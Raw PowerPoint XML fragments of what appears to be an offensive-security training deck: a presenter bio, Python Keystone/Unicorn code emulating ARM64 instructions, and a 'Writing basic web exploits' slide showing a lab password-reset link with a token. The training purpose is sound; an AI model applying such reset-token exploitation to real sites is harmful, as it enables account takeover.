            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>except</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UcError</a:t>
            </a:r>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as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> e:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"ERROR: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> % e)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91D93938-2B58-4727-8D96-6C7422CE4BBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="6260897"/>
            <a:ext cx="1034716" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5879862C-8C09-4FCF-BDC3-600FE39BD6C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5095605" y="6060842"/>
            <a:ext cx="4730184"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Emulate ARM64 code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Emulation done. Below is the CPU context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>W0 = 0x6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377372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187823" y="1134035"/>
            <a:ext cx="4415118" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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3B8EB2B-0B2F-4819-BC0E-5646F348B5B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2198711" y="1994074"/>
            <a:ext cx="8280408" cy="4457952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Yousuf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Alhajri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>@D4rkness_14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A cyber security enthusiast and a programmer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Certifications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>OSCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>Offensive Security Certified Professional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>OSWE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>Offensive Security Web Expert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>OSEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>Offensive Security Experienced Penetration Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>OSED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>Offensive Security Exploit Developer)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>OSCE3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>Offensive Security Certified Expert 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64B04A6D-2A2B-4EC0-9DFC-6798DA7EC1E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="191233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Writing basic web exploits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Now, if we browse the following link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13" descr="Interactive interpreter">
            <a:hlinkClick r:id="rId3"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80B36DEA-0EF3-4247-8DC8-4A58FA4FFFF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1849956" y="2209289"/>
            <a:ext cx="1013750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http://172.16.238.100/reset?code=f535c5cb79fda9a518fee98d015492c25dd03db6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Graphical user interface, website&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2243FAD-4CD3-4858-A164-F9660A73C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5053" y="2594811"/>
            <a:ext cx="9769642" cy="4162926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7464920C-15D3-42C9-8BE5-615C88117670}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76363176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1820780" y="0"/>
            <a:ext cx="7628022" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Keystone/Capstone/Unicorn engines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBB75226-DD9E-4E3F-A9E1-5CEC1A376888}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>200</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{477C561B-95ED-47CB-B714-7B589A8986E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4372577" y="597103"/>
            <a:ext cx="3275497" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Unicorn Engine (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCE338B-1B4B-49BE-A06F-0950AA054363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299334" y="1076694"/>
            <a:ext cx="10230855" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can also use several engines at once too</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D91C4C9B-E90E-41F0-A2A7-0BA77112F4CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659183" y="1504986"/>
            <a:ext cx="8280280" cy="451662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50" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> unicorn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> unicorn.arm64_const </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> keystone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ARM64_CODE  = ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># ARM64 code to be emulated </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a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"mov w0, #0x5 ;"</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a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"add w0, w1, w0"</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p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># Initialize keystone engine</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ARM64_CODE, count = ks.asm(ARM64_CODE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ARM64_CODE = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(ARM64_CODE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1250" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ADDRESS = </a:t>
            </a:r>
            <a:r>
